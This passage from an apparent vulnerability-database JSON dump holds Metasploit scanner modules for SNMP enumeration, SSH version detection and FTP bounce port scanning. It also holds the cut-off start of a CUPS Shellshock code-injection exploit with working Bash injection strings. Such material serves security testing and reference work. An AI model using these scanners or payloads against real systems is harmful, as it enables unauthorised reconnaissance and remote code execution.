network_ip.push([ifid.value, ipaddr.value, netmask.value, bcast.value])\n end\n\n if not network_ip.empty?\n output_data[\"Network IP\"] = [[\"Id\",\"IP Address\",\"Netmask\",\"Broadcast\"]] + network_ip\n end\n\n routing = []\n\n snmp.walk([\n \"1.3.6.1.2.1.4.21.1.1\", \"1.3.6.1.2.1.4.21.1.7\",\n \"1.3.6.1.2.1.4.21.1.11\",\"1.3.6.1.2.1.4.21.1.3\"\n ]) do |dest,hop,mask,metric|\n if (metric.value.to_s.empty?)\n metric.value = '-'\n end\n routing.push([dest.value, hop.value, mask.value, metric.value])\n end\n\n if not routing.empty?\n output_data[\"Routing information\"] = [[\"Destination\",\"Next hop\",\"Mask\",\"Metric\"]] + routing\n end\n\n tcp = []\n\n snmp.walk([\n \"1.3.6.1.2.1.6.13.1.2\",\"1.3.6.1.2.1.6.13.1.3\",\"1.3.6.1.2.1.6.13.1.4\",\n \"1.3.6.1.2.1.6.13.1.5\",\"1.3.6.1.2.1.6.13.1.1\"\n ]) do |ladd,lport,radd,rport,state|\n\n if (ladd.value.to_s.empty? or ladd.value.to_s =~ /noSuchInstance/)\n ladd = \"-\"\n else\n ladd = ladd.value\n end\n\n if (lport.value.to_s.empty? or lport.value.to_s =~ /noSuchInstance/)\n lport = \"-\"\n else\n lport = lport.value\n end\n\n if (radd.value.to_s.empty? or radd.value.to_s =~ /noSuchInstance/)\n radd = \"-\"\n else\n radd = radd.value\n end\n\n if (rport.value.to_s.empty? 
or rport.value.to_s =~ /noSuchInstance/)\n rport = \"-\"\n else\n rport = rport.value\n end\n\n case state.value\n when 1\n state = \"closed\"\n when 2\n state = \"listen\"\n when 3\n state = \"synSent\"\n when 4\n state = \"synReceived\"\n when 5\n state = \"established\"\n when 6\n state = \"finWait1\"\n when 7\n state = \"finWait2\"\n when 8\n state = \"closeWait\"\n when 9\n state = \"lastAck\"\n when 10\n state = \"closing\"\n when 11\n state = \"timeWait\"\n when 12\n state = \"deleteTCB\"\n else\n state = \"unknown\"\n end\n\n tcp.push([ladd, lport, radd, rport, state])\n end\n\n if not tcp.empty?\n output_data[\"TCP connections and listening ports\"] = [[\"Local address\",\"Local port\",\"Remote address\",\"Remote port\",\"State\"]] + tcp\n end\n\n udp = []\n\n snmp.walk([\"1.3.6.1.2.1.7.5.1.1\",\"1.3.6.1.2.1.7.5.1.2\"]) do |ladd,lport|\n udp.push([ladd.value, lport.value])\n end\n\n if not udp.empty?\n output_data[\"Listening UDP ports\"] = [[\"Local address\",\"Local port\"]] + udp\n end\n\n if (sysDesc =~ /Windows/)\n network_services = []\n n = 0\n snmp.walk([\"1.3.6.1.4.1.77.1.2.3.1.1\",\"1.3.6.1.4.1.77.1.2.3.1.2\"]) do |name,installed|\n network_services.push([n,name.value])\n n+=1\n end\n\n if not network_services.empty?\n output_data[\"Network services\"] = [[\"Index\",\"Name\"]] + network_services\n end\n\n share = []\n\n snmp.walk([\n \"1.3.6.1.4.1.77.1.2.27.1.1\",\"1.3.6.1.4.1.77.1.2.27.1.2\",\"1.3.6.1.4.1.77.1.2.27.1.3\"\n ]) do |name,path,comment|\n share.push({\" Name\"=>name.value, \" Path\"=>path.value, \" Comment\"=>comment.value})\n end\n\n if not share.empty?\n output_data[\"Share\"] = share\n end\n\n iis = {}\n\n http_totalBytesSentLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.2.0')\n if http_totalBytesSentLowWord.to_s !~ /Null/\n iis[\"TotalBytesSentLowWord\"] = http_totalBytesSentLowWord\n end\n\n http_totalBytesReceivedLowWord = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.4.0')\n if http_totalBytesReceivedLowWord.to_s !~ /Null/\n 
iis[\"TotalBytesReceivedLowWord\"] = http_totalBytesReceivedLowWord\n end\n\n http_totalFilesSent = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.5.0')\n if http_totalFilesSent.to_s !~ /Null/\n iis[\"TotalFilesSent\"] = http_totalFilesSent\n end\n\n http_currentAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.6.0')\n if http_currentAnonymousUsers.to_s !~ /Null/\n iis[\"CurrentAnonymousUsers\"] = http_currentAnonymousUsers\n end\n\n http_currentNonAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.7.0')\n if http_currentNonAnonymousUsers.to_s !~ /Null/\n iis[\"CurrentNonAnonymousUsers\"] = http_currentNonAnonymousUsers\n end\n\n http_totalAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.8.0')\n if http_totalAnonymousUsers.to_s !~ /Null/\n iis[\"TotalAnonymousUsers\"] = http_totalAnonymousUsers\n end\n\n http_totalNonAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.9.0')\n if http_totalNonAnonymousUsers.to_s !~ /Null/\n iis[\"TotalNonAnonymousUsers\"] = http_totalNonAnonymousUsers\n end\n\n http_maxAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.10.0')\n if http_maxAnonymousUsers.to_s !~ /Null/\n iis[\"MaxAnonymousUsers\"] = http_maxAnonymousUsers\n end\n\n http_maxNonAnonymousUsers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.11.0')\n if http_maxNonAnonymousUsers.to_s !~ /Null/\n iis[\"MaxNonAnonymousUsers\"] = http_maxNonAnonymousUsers\n end\n\n http_currentConnections = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.12.0')\n if http_currentConnections.to_s !~ /Null/\n iis[\"CurrentConnections\"] = http_currentConnections\n end\n\n http_maxConnections = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.13.0')\n if http_maxConnections.to_s !~ /Null/\n iis[\"MaxConnections\"] = http_maxConnections\n end\n\n http_connectionAttempts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.14.0')\n if http_connectionAttempts.to_s !~ /Null/\n iis[\"ConnectionAttempts\"] = http_connectionAttempts\n end\n\n http_logonAttempts = 
snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.15.0')\n if http_logonAttempts.to_s !~ /Null/\n iis[\"LogonAttempts\"] = http_logonAttempts\n end\n\n http_totalGets = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.16.0')\n if http_totalGets.to_s !~ /Null/\n iis[\"Gets\"] = http_totalGets\n end\n\n http_totalPosts = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.17.0')\n if http_totalPosts.to_s !~ /Null/\n iis[\"Posts\"] = http_totalPosts\n end\n\n http_totalHeads = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.18.0')\n if http_totalHeads.to_s !~ /Null/\n iis[\"Heads\"] = http_totalHeads\n end\n\n http_totalOthers = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.19.0')\n if http_totalOthers.to_s !~ /Null/\n iis[\"Others\"] = http_totalOthers\n end\n\n http_totalCGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.20.0')\n if http_totalCGIRequests.to_s !~ /Null/\n iis[\"CGIRequests\"] = http_totalCGIRequests\n end\n\n http_totalBGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.21.0')\n if http_totalBGIRequests.to_s !~ /Null/\n iis[\"BGIRequests\"] = http_totalBGIRequests\n end\n\n http_totalNotFoundErrors = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.22.0')\n if http_totalNotFoundErrors.to_s !~ /Null/\n iis[\"NotFoundErrors\"] = http_totalNotFoundErrors\n end\n\n if not iis.empty?\n output_data[\"IIS server information\"] = iis\n end\n end\n\n storage_information = []\n\n snmp.walk([\n \"1.3.6.1.2.1.25.2.3.1.1\", \"1.3.6.1.2.1.25.2.3.1.2\", \"1.3.6.1.2.1.25.2.3.1.3\",\n \"1.3.6.1.2.1.25.2.3.1.4\", \"1.3.6.1.2.1.25.2.3.1.5\", \"1.3.6.1.2.1.25.2.3.1.6\"\n ]) do |index,type,descr,allocation,size,used|\n\n case type.value.to_s\n when /^1.3.6.1.2.1.25.2.1.1$/\n type.value = \"Other\"\n when /^1.3.6.1.2.1.25.2.1.2$/\n type.value = \"Ram\"\n when /^1.3.6.1.2.1.25.2.1.3$/\n type.value = \"Virtual Memory\"\n when /^1.3.6.1.2.1.25.2.1.4$/\n type.value = \"Fixed Disk\"\n when /^1.3.6.1.2.1.25.2.1.5$/\n type.value = \"Removable Disk\"\n when /^1.3.6.1.2.1.25.2.1.6$/\n type.value = \"Floppy Disk\"\n when 
/^1.3.6.1.2.1.25.2.1.7$/\n type.value = \"Compact Disc\"\n when /^1.3.6.1.2.1.25.2.1.8$/\n type.value = \"RamDisk\"\n when /^1.3.6.1.2.1.25.2.1.9$/\n type.value = \"Flash Memory\"\n when /^1.3.6.1.2.1.25.2.1.10$/\n type.value = \"Network Disk\"\n else\n type.value = \"unknown\"\n end\n\n allocation.value = \"unknown\" if allocation.value.to_s =~ /noSuchInstance/\n size.value = \"unknown\" if size.value.to_s =~ /noSuchInstance/\n used.value = \"unknown\" if used.value.to_s =~ /noSuchInstance/\n\n storage_information.push([[descr.value],[index.value],[type.value],[allocation.value],[size.value],[used.value]])\n end\n\n if not storage_information.empty?\n storage = []\n storage_information.each {|a,b,c,d,e,f|\n s = {}\n\n e = number_to_human_size(e,d)\n f = number_to_human_size(f,d)\n\n s[\"Description\"]= a\n s[\"Device id\"] = b\n s[\"Filesystem type\"] = c\n s[\"Device unit\"] = d\n s[\"Memory size\"] = e\n s[\"Memory used\"] = f\n\n storage.push(s)\n }\n output_data[\"Storage information\"] = storage\n end\n\n file_system = {}\n\n hrFSIndex = snmp.get_value('1.3.6.1.2.1.25.3.8.1.1.1')\n if hrFSIndex.to_s !~ /Null/\n file_system[\"Index\"] = hrFSIndex\n end\n\n hrFSMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.2.1')\n if hrFSMountPoint.to_s !~ /Null/\n file_system[\"Mount point\"] = hrFSMountPoint\n end\n\n hrFSRemoteMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.3.1')\n if hrFSRemoteMountPoint.to_s !~ /Null/ and hrFSRemoteMountPoint.to_s !~ /^noSuch/\n if hrFSRemoteMountPoint.empty?\n hrFSRemoteMountPoint = '-'\n end\n file_system[\"Remote mount point\"] = hrFSRemoteMountPoint\n end\n\n hrFSType = snmp.get_value('1.3.6.1.2.1.25.3.8.1.4.1')\n\n case hrFSType.to_s\n when /^1.3.6.1.2.1.25.3.9.1$/\n hrFSType = \"Other\"\n when /^1.3.6.1.2.1.25.3.9.2$/\n hrFSType = \"Unknown\"\n when /^1.3.6.1.2.1.25.3.9.3$/\n hrFSType = \"BerkeleyFFS\"\n when /^1.3.6.1.2.1.25.3.9.4$/\n hrFSType = \"Sys5FS\"\n when /^1.3.6.1.2.1.25.3.9.5$/\n hrFSType = \"Fat\"\n when 
/^1.3.6.1.2.1.25.3.9.6$/\n hrFSType = \"HPFS\"\n when /^1.3.6.1.2.1.25.3.9.7$/\n hrFSType = \"HFS\"\n when /^1.3.6.1.2.1.25.3.9.8$/\n hrFSType = \"MFS\"\n when /^1.3.6.1.2.1.25.3.9.9$/\n hrFSType = \"NTFS\"\n when /^1.3.6.1.2.1.25.3.9.10$/\n hrFSType = \"VNode\"\n when /^1.3.6.1.2.1.25.3.9.11$/\n hrFSType = \"Journaled\"\n when /^1.3.6.1.2.1.25.3.9.12$/\n hrFSType = \"iso9660\"\n when /^1.3.6.1.2.1.25.3.9.13$/\n hrFSType = \"RockRidge\"\n when /^1.3.6.1.2.1.25.3.9.14$/\n hrFSType = \"NFS\"\n when /^1.3.6.1.2.1.25.3.9.15$/\n hrFSType = \"Netware\"\n when /^1.3.6.1.2.1.25.3.9.16$/\n hrFSType = \"AFS\"\n when /^1.3.6.1.2.1.25.3.9.17$/\n hrFSType = \"DFS\"\n when /^1.3.6.1.2.1.25.3.9.18$/\n hrFSType = \"Appleshare\"\n when /^1.3.6.1.2.1.25.3.9.19$/\n hrFSType = \"RFS\"\n when /^1.3.6.1.2.1.25.3.9.20$/\n hrFSType = \"DGCFS\"\n when /^1.3.6.1.2.1.25.3.9.21$/\n hrFSType = \"BFS\"\n when /^1.3.6.1.2.1.25.3.9.22$/\n hrFSType = \"FAT32\"\n when /^1.3.6.1.2.1.25.3.9.23$/\n hrFSType = \"LinuxExt2\"\n else\n hrFSType = \"Null\"\n end\n\n if hrFSType.to_s !~ /Null/\n file_system[\"Type\"] = hrFSType\n end\n\n hrFSAccess = snmp.get_value('1.3.6.1.2.1.25.3.8.1.5.1')\n if hrFSAccess.to_s !~ /Null/\n file_system[\"Access\"] = hrFSAccess\n end\n\n hrFSBootable = snmp.get_value('1.3.6.1.2.1.25.3.8.1.6.1')\n if hrFSBootable.to_s !~ /Null/\n file_system[\"Bootable\"] = hrFSBootable\n end\n\n if not file_system.empty?\n output_data[\"File system information\"] = file_system\n end\n\n device_information = []\n\n snmp.walk([\n \"1.3.6.1.2.1.25.3.2.1.1\", \"1.3.6.1.2.1.25.3.2.1.2\",\n \"1.3.6.1.2.1.25.3.2.1.5\", \"1.3.6.1.2.1.25.3.2.1.3\"\n ]) do |index,type,status,descr|\n\n case type.value.to_s\n when /^1.3.6.1.2.1.25.3.1.1$/\n type.value = \"Other\"\n when /^1.3.6.1.2.1.25.3.1.2$/\n type.value = \"Unknown\"\n when /^1.3.6.1.2.1.25.3.1.3$/\n type.value = \"Processor\"\n when /^1.3.6.1.2.1.25.3.1.4$/\n type.value = \"Network\"\n when /^1.3.6.1.2.1.25.3.1.5$/\n type.value = \"Printer\"\n 
when /^1.3.6.1.2.1.25.3.1.6$/\n type.value = \"Disk Storage\"\n when /^1.3.6.1.2.1.25.3.1.10$/\n type.value = \"Video\"\n when /^1.3.6.1.2.1.25.3.1.11$/\n type.value = \"Audio\"\n when /^1.3.6.1.2.1.25.3.1.12$/\n type.value = \"Coprocessor\"\n when /^1.3.6.1.2.1.25.3.1.13$/\n type.value = \"Keyboard\"\n when /^1.3.6.1.2.1.25.3.1.14$/\n type.value = \"Modem\"\n when /^1.3.6.1.2.1.25.3.1.15$/\n type.value = \"Parallel Port\"\n when /^1.3.6.1.2.1.25.3.1.16$/\n type.value = \"Pointing\"\n when /^1.3.6.1.2.1.25.3.1.17$/\n type.value = \"Serial Port\"\n when /^1.3.6.1.2.1.25.3.1.18$/\n type.value = \"Tape\"\n when /^1.3.6.1.2.1.25.3.1.19$/\n type.value = \"Clock\"\n when /^1.3.6.1.2.1.25.3.1.20$/\n type.value = \"Volatile Memory\"\n when /^1.3.6.1.2.1.25.3.1.21$/\n type.value = \"Non Volatile Memory\"\n else\n type.value = \"unknown\"\n end\n\n case status.value\n when 1\n status.value = \"unknown\"\n when 2\n status.value = \"running\"\n when 3\n status.value = \"warning\"\n when 4\n status.value = \"testing\"\n when 5\n status.value = \"down\"\n else\n status.value = \"unknown\"\n end\n\n descr.value = \"unknown\" if descr.value.to_s =~ /noSuchInstance/\n\n device_information.push([index.value, type.value, status.value, descr.value])\n end\n\n if not device_information.empty?\n output_data[\"Device information\"] = [[\"Id\",\"Type\",\"Status\",\"Descr\"]] + device_information\n end\n\n software_list = []\n\n snmp.walk([\"1.3.6.1.2.1.25.6.3.1.1\",\"1.3.6.1.2.1.25.6.3.1.2\"]) do |index,name|\n software_list.push([index.value,name.value])\n end\n\n if not software_list.empty?\n output_data[\"Software components\"] = [[\"Index\",\"Name\"]] + software_list\n end\n\n process_interfaces = []\n\n snmp.walk([\n \"1.3.6.1.2.1.25.4.2.1.1\", \"1.3.6.1.2.1.25.4.2.1.2\", \"1.3.6.1.2.1.25.4.2.1.4\",\n \"1.3.6.1.2.1.25.4.2.1.5\", \"1.3.6.1.2.1.25.4.2.1.7\"\n ]) do |id,name,path,param,status|\n\n if status.value == 1\n status.value = \"running\"\n elsif status.value == 2\n status.value 
= \"runnable\"\n else\n status.value = \"unknown\"\n end\n\n process_interfaces.push([id.value, status.value, name.value, path.value, param.value])\n end\n\n if not process_interfaces.empty?\n output_data[\"Processes\"] = [[\"Id\",\"Status\",\"Name\",\"Path\",\"Parameters\"]] + process_interfaces\n end\n\n print_line(\"\\n[*] System information:\\n\")\n\n line = \"\"\n width = 30 # name field width\n twidth = 32 # table like display cell width\n\n fields_order.each {|k|\n if not output_data.has_key?(k)\n next\n end\n\n v = output_data[k]\n\n case v\n when Array\n content = \"\"\n\n v.each{ |a|\n case a\n when Hash\n a.each{ |sk, sv|\n sk = truncate_to_twidth(sk, twidth)\n content << sprintf(\"%s%s: %s\\n\", sk, \" \"*([0,width-sk.length].max), sv)\n }\n content << \"\\n\"\n when Array\n a.each { |sv|\n sv = sv.to_s.strip\n # I don't like cutting info\n #sv = truncate_to_twidth(sv, twidth)\n content << sprintf(\"%-20s\", sv)\n }\n content << \"\\n\"\n else\n content << sprintf(\" %s\\n\", a)\n content << \"\\n\"\n end\n }\n\n report_note(\n :host => ip,\n :proto => 'udp',\n :sname => 'snmp',\n :port => datastore['RPORT'].to_i,\n :type => \"snmp.#{k}\",\n :data => content\n )\n\n line << \"\\n[*] #{k}:\\n\\n#{content}\"\n\n when Hash\n content = \"\"\n v.each{ |sk, sv|\n sk = truncate_to_twidth(sk,twidth)\n content << sprintf(\"%s%s: %s\\n\", sk, \" \"*([0,width-sk.length].max), sv)\n }\n\n report_note(\n :host => ip,\n :proto => 'udp',\n :sname => 'snmp',\n :port => datastore['RPORT'].to_i,\n :type => \"snmp.#{k}\",\n :data => content\n )\n\n line << \"\\n[*] #{k}:\\n\\n#{content}\"\n content << \"\\n\"\n else\n if (v.nil? or v.empty? 
or v =~ /Null/)\n v = '-'\n end\n\n report_note(\n :host => ip,\n :proto => 'udp',\n :sname => 'snmp',\n :port => datastore['RPORT'].to_i,\n :type => \"snmp.#{k}\",\n :data => v\n )\n\n k = truncate_to_twidth(k,twidth)\n line << sprintf(\"%s%s: %s\\n\", k, \" \"*([0,width-k.length].max), v)\n end\n }\n\n print_line(line)\n print_line('')\n\n rescue SNMP::RequestTimeout\n print_error(\"#{ip} SNMP request timeout.\")\n rescue Rex::ConnectionError\n print_error(\"#{ip} Connection refused.\")\n rescue SNMP::InvalidIpAddress\n print_error(\"#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.\")\n rescue SNMP::UnsupportedVersion\n print_error(\"#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Unknown error: #{e.class} #{e}\")\n elog(\"Unknown error: #{e.class} #{e}\")\n elog(\"Call stack:\\n#{e.backtrace.join \"\\n\"}\")\n ensure\n disconnect_snmp\n end\n end\n\n def truncate_to_twidth(string,twidth)\n string.slice(0..twidth-2)\n end\n\n def number_to_human_size(size,unit)\n size = size.first.to_i * unit.first.to_i\n\n if size < 1024\n \"#{size} bytes\"\n elsif size < 1024.0 * 1024.0\n \"%.02f KB\" % (size / 1024.0)\n elsif size < 1024.0 * 1024.0 * 1024.0\n \"%.02f MB\" % (size / 1024.0 / 1024.0)\n else\n \"%.02f GB\" % (size / 1024.0 / 1024.0 / 1024.0)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/snmp/snmp_enum.rb"}, {"lastseen": "2019-12-15T05:14:05", "bulletinFamily": "exploit", "description": "Detect SSH Version.\n", "modified": "2017-07-24T13:26:21", "published": "2009-05-11T02:46:59", "id": "MSF:AUXILIARY/SCANNER/SSH/SSH_VERSION", "href": "", "type": "metasploit", "title": "SSH Version Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'recog'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # the default timeout (in seconds) to wait, in total, for both a successful\n # connection to a given endpoint and for the initial protocol response\n # from the supposed SSH endpoint to be returned\n DEFAULT_TIMEOUT = 30\n\n def initialize\n super(\n 'Name' => 'SSH Version Scanner',\n 'Description' => 'Detect SSH Version.',\n 'References' =>\n [\n [ 'URL', 'http://en.wikipedia.org/wiki/SecureShell' ]\n ],\n 'Author' => [ 'Daniel van Eeden <metasploit[at]myname.nl>' ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(22),\n OptInt.new('TIMEOUT', [true, 'Timeout for the SSH probe', DEFAULT_TIMEOUT])\n ],\n self.class\n )\n end\n\n def timeout\n datastore['TIMEOUT'] <= 0 ? DEFAULT_TIMEOUT : datastore['TIMEOUT']\n end\n\n\n def run_host(target_host)\n begin\n ::Timeout.timeout(timeout) do\n connect\n\n resp = sock.get_once(-1, timeout)\n\n if ! 
resp\n vprint_warning(\"No response\")\n return\n end\n\n ident, first_message = resp.split(/[\\r\\n]+/)\n info = \"\"\n\n if /^SSH-\\d+\\.\\d+-(.*)$/ !~ ident\n vprint_warning(\"Was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}\")\n return\n end\n\n banner = $1\n\n # Try to match with Recog and show the relevant fields to the user\n recog_match = Recog::Nizer.match('ssh.banner', banner)\n if recog_match\n info << \" ( \"\n recog_match.each_pair do |k,v|\n next if k == 'matched'\n info << \"#{k}=#{v} \"\n end\n info << \")\"\n end\n\n # Check to see if this is Kippo, which sends a premature\n # key init exchange right on top of the SSH version without\n # waiting for the required client identification string.\n if first_message && first_message.size >= 5\n extra = first_message.unpack(\"NCCA*\") # sz, pad_sz, code, data\n if (extra.last.size + 2 == extra[0]) && extra[2] == 20\n info << \" (Kippo Honeypot)\"\n end\n end\n\n print_good(\"SSH server version: #{ident}#{info}\")\n report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: ident)\n end\n rescue Timeout::Error\n vprint_warning(\"Timed out after #{timeout} seconds. 
Skipping.\")\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssh/ssh_version.rb"}, {"lastseen": "2019-12-14T00:25:09", "bulletinFamily": "exploit", "description": "Enumerate TCP services via the FTP bounce PORT/LIST method.\n", "modified": "2019-03-05T09:38:51", "published": "2009-01-23T02:05:28", "id": "MSF:AUXILIARY/SCANNER/PORTSCAN/FTPBOUNCE", "href": "", "type": "metasploit", "title": "FTP Bounce Port Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Order is important here\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::Ftp\n\n def initialize\n super(\n 'Name' => 'FTP Bounce Port Scanner',\n 'Description' => %q{\n Enumerate TCP services via the FTP bounce PORT/LIST\n method.\n },\n 'Author' => 'kris katterjohn',\n 'License' => MSF_LICENSE\n )\n\n register_options([\n OptString.new('PORTS', [true, \"Ports to scan (e.g. 
22-25,80,110-900)\", \"1-10000\"]),\n OptAddress.new('BOUNCEHOST', [true, \"FTP relay host\"]),\n OptPort.new('BOUNCEPORT', [true, \"FTP relay port\", 21]),\n OptInt.new('DELAY', [true, \"The delay between connections, per thread, in milliseconds\", 0]),\n OptInt.new('JITTER', [true, \"The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.\", 0])\n ])\n\n deregister_options('RPORT')\n end\n\n # No IPv6 support yet\n def support_ipv6?\n false\n end\n\n def rhost\n datastore['BOUNCEHOST']\n end\n\n def rport\n datastore['BOUNCEPORT']\n end\n\n def run_host(ip)\n ports = Rex::Socket.portspec_crack(datastore['PORTS'])\n if ports.empty?\n raise Msf::OptionValidateError.new(['PORTS'])\n end\n\n jitter_value = datastore['JITTER'].to_i\n if jitter_value < 0\n raise Msf::OptionValidateError.new(['JITTER'])\n end\n\n delay_value = datastore['DELAY'].to_i\n if delay_value < 0\n raise Msf::OptionValidateError.new(['DELAY'])\n end\n\n return if not connect_login\n\n ports.each do |port|\n # Clear out the receive buffer since we're heavily dependent\n # on the response codes. 
We need to do this between every\n # port scan attempt unfortunately.\n while true\n r = sock.get_once(-1, 0.25)\n break if not r or r.empty?\n end\n\n begin\n\n # Add the delay based on JITTER and DELAY if needs be\n add_delay_jitter(delay_value,jitter_value)\n\n host = (ip.split('.') + [port / 256, port % 256]).join(',')\n resp = send_cmd([\"PORT\", host])\n\n if resp =~ /^5/\n #print_error(\"Got error from PORT to #{ip}:#{port}\")\n next\n elsif not resp\n next\n end\n\n resp = send_cmd([\"LIST\"])\n\n if resp =~ /^[12]/\n print_good(\" TCP OPEN #{ip}:#{port}\")\n report_service(:host => ip, :port => port)\n end\n rescue ::Exception\n print_error(\"Unknown error: #{$!}\")\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/portscan/ftpbounce.rb"}], "exploitdb": [{"lastseen": "2016-02-04T00:39:00", "bulletinFamily": "exploit", "description": "CUPS Filter Bash Environment Variable Code Injection. 
CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE-...", "modified": "2014-10-29T00:00:00", "published": "2014-10-29T00:00:00", "id": "EDB-ID:35115", "href": "https://www.exploit-db.com/exploits/35115/", "type": "exploitdb", "title": "CUPS Filter Bash Environment Variable Code Injection", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'CUPS Filter Bash Environment Variable Code Injection',\r\n 'Description' => %q{\r\n This module exploits a post-auth code injection in specially crafted\r\n environment variables in Bash, specifically targeting CUPS filters\r\n through the PRINTER_INFO and PRINTER_LOCATION variables by default.\r\n },\r\n 'Author' => [\r\n 'Stephane Chazelas', # Vulnerability discovery\r\n 'lcamtuf', # CVE-2014-6278\r\n 'Brendan Coles <bcoles[at]gmail.com>' # msf\r\n ],\r\n 'References' => [\r\n ['CVE', '2014-6271'],\r\n ['CVE', '2014-6278'],\r\n ['EDB', '34765'],\r\n ['URL', 'https://access.redhat.com/articles/1200223'],\r\n ['URL', 'http://seclists.org/oss-sec/2014/q3/649']\r\n ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix',\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\\x0A\\x0D\",\r\n 'DisableNops' => true\r\n },\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic bash awk ruby'\r\n },\r\n # Tested:\r\n # - CUPS version 1.4.3 on Ubuntu 10.04 (x86)\r\n # - CUPS version 1.5.3 on Debian 7 (x64)\r\n # - CUPS version 1.6.2 on Fedora 19 (x64)\r\n # - CUPS version 1.7.2 on Ubuntu 14.04 (x64)\r\n 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],\r\n 'DefaultTarget' => 0,\r\n 
'DisclosureDate' => 'Sep 24 2014',\r\n 'License' => MSF_LICENSE\r\n ))\r\n register_options([\r\n Opt::RPORT(631),\r\n OptBool.new('SSL', [ true, 'Use SSL', true ]),\r\n OptString.new('USERNAME', [ true, 'CUPS username', 'root']),\r\n OptString.new('PASSWORD', [ true, 'CUPS user password', '']),\r\n OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),\r\n OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # CVE-2014-6271\r\n #\r\n def cve_2014_6271(cmd)\r\n %{() { :;}; $(#{cmd}) & }\r\n end\r\n\r\n #\r\n # CVE-2014-6278\r\n #\r\n def cve_2014_6278(cmd)\r\n %{() { _; } >_[$($())] { echo -e \"\\r\\n$(#{cmd})\\r\\n\" ; }}\r\n end\r\n\r\n #\r\n # Check credentials\r\n #\r\n def check\r\n @cookie = rand_text_alphanumeric(16)\r\n printer_name = rand_text_alphanumeric(10 + rand(5))\r\n res = add_printer(printer_name, '')\r\n if !res\r\n vprint_error(\"#{peer} - No response from host\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.headers['Server'] =~ /CUPS\\/([\\d\\.]+)/\r\n vprint_status(\"#{peer} - Found CUPS version #{$1}\")\r\n else\r\n print_status(\"#{peer} - Target is not a CUPS web server\")\r\n return Exploit::CheckCode::Safe\r\n end\r\n if res.body =~ /Set Default Options for #{printer_name}/\r\n vprint_good(\"#{peer} - Added printer successfully\")\r\n delete_printer(printer_name)\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n vprint_error(\"#{peer} - Authentication failed\")\r\n elsif res.code == 426\r\n vprint_error(\"#{peer} - SSL required - set SSL true\")\r\n end\r\n Exploit::CheckCode::Detected\r\n end\r\n\r\n #\r\n # Exploit\r\n #\r\n def exploit\r\n @cookie = rand_text_alphanumeric(16)\r\n printer_name = rand_text_alphanumeric(10 + rand(5))\r\n\r\n # Select target CVE\r\n case datastore['CVE']\r\n when 'CVE-2014-6278'\r\n cmd = cve_2014_6278(payload.raw)\r\n else\r\n cmd = cve_2014_6271(payload.raw)\r\n 
